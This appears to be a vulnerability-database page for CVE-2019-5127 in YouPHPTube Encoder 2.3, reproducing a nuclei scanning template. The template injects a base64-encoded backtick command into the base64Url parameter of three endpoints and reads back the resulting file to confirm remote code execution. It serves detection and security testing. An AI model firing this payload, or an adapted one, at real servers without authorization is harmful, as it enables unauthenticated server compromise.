Lucene search
K

YouPHPTube Encoder 2.3 - Remote Command Injection

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 117 Views

YouPHPTube Encoder 2.3 - Command Injection allows unauthorized remote code executio

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2019-5127
29 Jan 202409:41
circl
Check Point Advisories
YouPHPTube Encoder Command Injection (CVE-2019-5127; CVE-2019-5128; CVE-2019-5129)
25 Feb 202000:00
checkpoint_advisories
CVE
CVE-2019-5127
25 Oct 201917:12
cve
Cvelist
CVE-2019-5127
25 Oct 201917:12
cvelist
NVD
CVE-2019-5127
25 Oct 201918:15
nvd
OSV
CVE-2019-5127
25 Oct 201918:15
osv
Prion
Command injection
25 Oct 201918:15
prion
RedhatCVE
CVE-2019-5127
5 Feb 202517:57
redhatcve
Talos
YouPHPTube Encoder base64Url multiple command injections
17 Oct 201900:00
talos
Talos Blog
Vulnerability Spotlight: Multiple vulnerabilities in YouPHPTube
30 Oct 201906:27
talosblog
Rows per page
id: CVE-2019-5127

info:
  name: YouPHPTube Encoder 2.3 - Remote Command Injection
  author: pikpikcu
  severity: critical
  description: YouPHPTube Encoder 2.3 is susceptible to a command injection vulnerability which could allow an attacker to compromise the server. These exploitable unauthenticated command injections exist via the parameter base64Url in /objects/getImage.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the entire system.
  remediation: |
    Apply the latest patch or upgrade to a version that is not affected by this vulnerability.
  reference:
    - https://talosintelligence.com/vulnerability_reports/TALOS-2019-0917
    - https://nvd.nist.gov/vuln/detail/CVE-2019-5127
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Elsfa7-110/kenzer-templates
    - https://github.com/sobinge/nuclei-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-5127
    cwe-id: CWE-78
    epss-score: 0.45302
    epss-percentile: 0.9863
    cpe: cpe:2.3:a:youphptube:youphptube_encoder:2.3:*:*:*:*:*:*:*
  metadata:
    max-request: 4
    vendor: youphptube
    product: youphptube_encoder
  tags: cve,cve2019,rce,youphptube,vkev,vuln
variables:
  filename: "{{to_lower(rand_text_alpha(5))}}"
  encode: "`id > {{filename}}.txt`"

http:
  - method: GET
    path:
      - "{{BaseURL}}/objects/getImage.php?base64Url={{base64(encode)}}=&format=png"
      - "{{BaseURL}}/objects/getImageMP4.php?base64Url={{base64(encode)}}=&format=jpg"
      - "{{BaseURL}}/objects/getSpiritsFromVideo.php?base64Url={{base64(encode)}}=&format=jpg"

    headers:
      Content-Type: application/x-www-form-urlencoded

  - method: GET
    path:
      - "{{BaseURL}}/objects/{{filename}}.txt"

    headers:
      Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=[0-9]+.*gid=[0-9]+.*"

      - type: word
        part: header
        words:
          - text/plain

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b14f08742ce95491d659d56ed4f778eaac1caf7d4f82f968e10df42e6872b2f2022100dc36affbc305cf1cc4d0f7e91c26992292b5c7e627f7a4b5e65b0fb0f0764703:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 27.5
CVSS 3.19.8
CVSS 310
EPSS0.45302
117